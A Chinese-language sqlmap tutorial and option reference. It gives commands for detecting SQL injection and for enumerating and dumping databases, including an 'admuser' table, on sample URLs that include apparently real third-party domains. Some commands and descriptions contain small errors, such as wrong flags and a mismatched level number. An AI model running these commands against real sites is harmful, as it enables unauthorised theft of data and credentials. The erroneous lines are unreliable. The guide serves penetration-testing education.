sqlmap 详解（sqlmap 语句）

Sqlmap是一款非常强大的SQL注入工具。

下载地址

http://sqlmap.org/

简介

sqlmap支持以下五种不同的注入模式:

1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。

2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。

3、基于报错注入,页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。

4、联合查询注入,可以使用联盟的情况下的注入。

5、堆查询注入,可以同时执行多条语句的执行时的注入。

Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点:

完全支持MySQL,甲骨文,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite,火鸟,Sybase, SAP MaxDB, HSQLDB和Informix等多种数据库管理系统。

更新

python sqlmap.py --update ——更新

检测注入

基本格式

sqlmap -u "http://www.vuln.cn/post.php?id=1″

-u 制定url

sqlmap -u "http://www.vuln.cn/post.php?id=1″ –dbms mysql –level 2

指定数据库类型为mysql，级别为3（共5级，级别越高，检测越全面）

一共有5级，5级最高，默认为1级，

1-5 ：get和post

2：http cookie

3：http User-Agent/Referer

从post数据包中注入

sqlmap -u "http://www.sougou.com/shnews.php" --method POST --data "id=1$passwd=123456" -p id

--method POST：指定提交方式为POST

--data：指定提交的数据

-p：指定SQL注入payload测试的参数

cookie注入

sqlmap -u "http://www.sougou.com/shnews.asp" -p "id" -–cookie –level 2

http头注入

sqlmap -r "1.txt"

-r：将http头信息保存到文件，进行测试

批量扫描注入点

sqlmap -r 1.txt --batch

-m : 批量扫描多个注入点

--batch：自动选择yes，防止中断，不需要人工手动每次都选择yes，no。

注入成功:

获取数据库基本信息

sqlmap.py -u "
http://www.blueber.com/./show_news.php?classid=1&id=459" -p id --dbms MySQL --dbs 获取数据库

sqlmap.py -u "http://www.blueber.com/./show_news.php?classid=1&id=459" -p id --dbms MySQL --current-db

查看当前运行的数据库

sqlmap.py -u "http://www.blueber.com/./show_news.php?classid=1&id=459" -p id --dbms MySQL -D my7531691 --tables

获取数据库中的表

sqlmap.py -u "http://www.blueber.com/./show_news.php?classid=1&id=459" -p id --dbms MySQL -D my7531691 -T admuser --columns

获取字段

sqlmap.py -u "http://www.blueber.com/./show_news.php?classid=1&id=459" -p id --dbs MySQL -D my7531691 -T admuser --dump

常用命令：

–is-dba 当前用户权限（是否为root权限）

–dbs 所有数据库

–current-db 网站当前数据库

–users 所有数据库用户

–current-user 当前数据库用户

–passwords 数据库密码

Options（选项）：

–version 显示程序的版本号并退出

-h, –help 显示此帮助消息并退出

-v VERBOSE 详细级别：0-6（默认为1）

Target（目标）：

-d DIRECT 直接连接到数据库。

-u 目标URL

-r REQUESTFILE 从一个文件中载入HTTP请求

Request（请求）：

这些选项可以用来指定如何连接到目标URL。

–data=DATA 通过POST发送的数据字符串

–cookie=COOKIE HTTP Cookie头

–user-agent=AGENT 指定 HTTP User – Agent头

–random-agent 使用随机选定的HTTP User – Agent头

–referer=REFERER 指定 HTTP Referer头

Enumeration（枚举）：

–current-user 检索数据库管理系统当前用户

–current-db 检索数据库管理系统当前数据库

–is-dba 检测DBMS当前用户是否DBA

–users 枚举数据库管理系统用户

–passwords 枚举数据库管理系统用户密码哈希

–privileges 枚举数据库管理系统用户的权限

–roles 枚举数据库管理系统用户的角色

–dbs 枚举数据库管理系统数据库

-D DBname 要进行枚举的指定数据库名

-T TBLname 要进行枚举的指定数据库表（如：-T tablename –columns）

–tables 枚举的DBMS数据库中的表

–columns 枚举DBMS数据库表列

–dump 转储数据库管理系统的数据库中的表项

–dump-all 转储所有的DBMS数据库表中的条目

-U USER 用来进行枚举的数据库用户

–sql-query=QUERY 要执行的SQL语句

–sql-shell 提示交互式SQL的shell

Optimization（优化）：

这些选项可用于优化SqlMap的性能。

-o 开启所有优化开关

Injection（注入）：

这些选项可以用来指定测试哪些参数， 提供自定义的注入payloads和可选篡改脚本。

-p TESTPARAMETER 可测试的参数（S）

–dbms=DBMS 强制后端的DBMS为此值

–os=OS 强制后端的DBMS操作系统为这个值

–tamper=TAMPER 使用给定的脚本（S）篡改注入数据

Detection（检测）：

这些选项可以用来指定在SQL盲注时如何解析和比较HTTP响应页面的内容。

–level=LEVEL 执行测试的等级（1-5，默认为1）

–risk=RISK 执行测试的风险（0-3，默认为1）